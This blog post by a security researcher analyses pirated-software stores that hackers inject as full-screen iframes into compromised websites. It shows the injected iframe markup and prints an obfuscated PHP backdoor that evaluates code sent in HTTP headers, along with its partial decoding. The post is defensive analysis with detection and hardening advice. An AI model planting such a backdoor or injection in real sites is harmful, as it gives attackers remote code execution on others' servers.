This is the time of the year when online sellers do their best to attract herds of holiday shoppers. Software pirates are no different. They offer huge discounts (up to 95%) for popular and expensive software products and provide user-friendly online stores. They even made their sites one step closer to you!
I’ve already written about black hat SEO schemes that pirates use to drive traffic to their sites. They all include compromising established legitimate sites and poisoning first pages of Google’s search results with links to doorway pages on hacked sites that redirect searchers further to illegal stores on servers controlled by criminals.
The doorway pages on legitimate websites is an important part of the scheme
However, there is a new development in this area. Instead of placing just doorway pages on compromised sites, hackers now create whole online stores there.
Here’s how it works: The keyword-rich spammy web pages on hacked sites check whether a visitor comes from a search engine and inject a full screen iframe at the very top of a web page. The iframe contains a familiar “software discounter” online store (identical to the ones I wrote before).
Note the double scrollbars on the screenshot — one pair of scrollbars belong to an iframe and the other to the entire web page. If you scroll down, you’ll see normal content of that web page.
Not every visitor from search engines can see that iframe. If a search query includes a “site:” operator, the iframe won’t be injected into the landing pages. Probably, the idea was to hide the shop from webmasters who use the “site:” searches. However the implementation of this idea is quite stupid — while the shop iframe is not visible, the spammy content on the landing page remains intact — a webmaster will be immediately aware of the compromise.
Although iframes allow to load web pages from third-party sites, in this case they load the “shop” pages from the same site. Here is a typical iframe code injected at the very bottom of a landing page:
<iframe border=0 style="border:none" width="100%" height="100%" src="/?vprx=1&prx=nUE0pQbiY2kcqzHgp29zqUqupzHhozI0Y3Abo3Nip2IupzAbYm9mCJSlL2ucL2SxWzAjow02ZwD%3D&nd=Ym92pUW4CGRzpUW4CJ5IEGOjHJWcJGWeL3S6FTqjZwy6pIIkqKO6FTuirxxjJGAOLz8mGzyjZxy1pUcOLyygBJ1QFyAfGQW1L0jlH3uKrxSdo3pjZyc3EPHmEN%3D%3D"></iframe>
To make sure that styles and scripts on a hijacked web page don’t interfere with the shop iframe, hackers make the following change to the <body> tag:
All images and style sheets are also loaded from the same domain. They all have similar URL structure. Something like this:
The indexed landing pages have URLs that also follow specific pattern: example.com/?word=number or example.com/path/file?word=number
This makes me think that index files on these sites contain injected code that processes requests with specific parameters to generate spammy landing pages (?word=number) and “shop” web pages (?vprx=1&prx=….)
Here is a list of real landing pages on compromised sites.
These rogue sites do pretty well in search results
On the latter screenshot, you can see how Google thinks that the rogue site on the-dream.co.uk matches the query (that returns 178,000 results) so well that it deserves 3 positions on the first page of search results plus the “+ show more results from the-dream.co.uk” link.
Maybe it’s just a coincidence, but about 85% of the hacked sites with installed pirated software stores were found on different IPs on DreamHost networks:
Most of these sites are on shared servers. And when I check other sites on those servers I usually find a few more sites with spammy links and doorway pages.
This sort of hacked sites distribution makes me suspect that DreamHost servers are somehow attractive to hackers. Probably, there is a way for attackers to hop from server to server and search for hackable sites.
As far as I can see, the rogue software stores on hacked legitimate sites are basically the same as the ones on dedicated servers that I described both last week and a year ago. Their look&feel is the same, and on the final “checkout” step, they redirect to well-known “paym8″ sites (e.g. payment8ltd .net/shop/order/ or 8payment. net/shop/order/).
I still don’t have enough information on how these shops work internally. I tried to contact webmasters of compromised sites, but at this point only received a couple of backdoor scripts. For example this file called .php:
$_0f4f6b="\x70\x72\x65\x67\x5f\x72\x65\x70 \x6c\x61\x63\x65";$_0f4f6b("\x7c\x2e\x7c\x65","\x65\x76\x61\x6c\x28\x27\x65\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x28\x22aWYobWQ1KCRfU0VSVkVSWydIVFRQX1 FVT1RFJ10pPT0nZTY2ZTZjYWRkNmUxM2VmZWE1NGVkNTBjMGViMmQzMmInIGFuZCBpc3NldCgkX1NFUlZFUlsnSFRUUF9YX0NPREUnXSkpIEBldmFsKEBiYXNlNjRfZGVjb2RlKHN0cnJldihAJF9TRVJWRVJbJ0hUVFBfWF9DT0RFJ10pKSk7\x22\x29\x29\x3b\x27\x29",'.');
which translates to something like this:
eval('eval("if(md5($_SERVER['HTTP_QUOTE'])=='e66e6cadd6e13efea54ed50c0eb2d32b' and isset($_SERVER['HTTP_X_CODE']))
I guess, it is clear that illegal online stores create serious problems for owners of compromised sites. Not only can they hurt search engine ranking for normal keywords and incur penalties, but also may be a reason to remove your website from a server (most hosting ToS prohibit selling pirated software).
Please check my doorway/spammy links detection instructions that I posted last week — they are also useful for revealing any unwanted content on your site, including such rogue stores.
Make sure that your files and directories are not world-writable. Leaving anything where your server neighbors can write to is an invitation to abuse your site.
Finally, if you find one of such shops on you site, you should contact the pirates (they provide a toll-free contact phone number +1-866-576-8741) and ask for your share in sales (don’t agree on less than 50%).
As always, I’m interested in any internal information about this sort of hacks. If you are a webmaster of a hacked site, or a representative of a hosting provider, please share your finding here in comments, or, if you don’t want to publicly disclose any sensitive information you can contact me directly. Thanks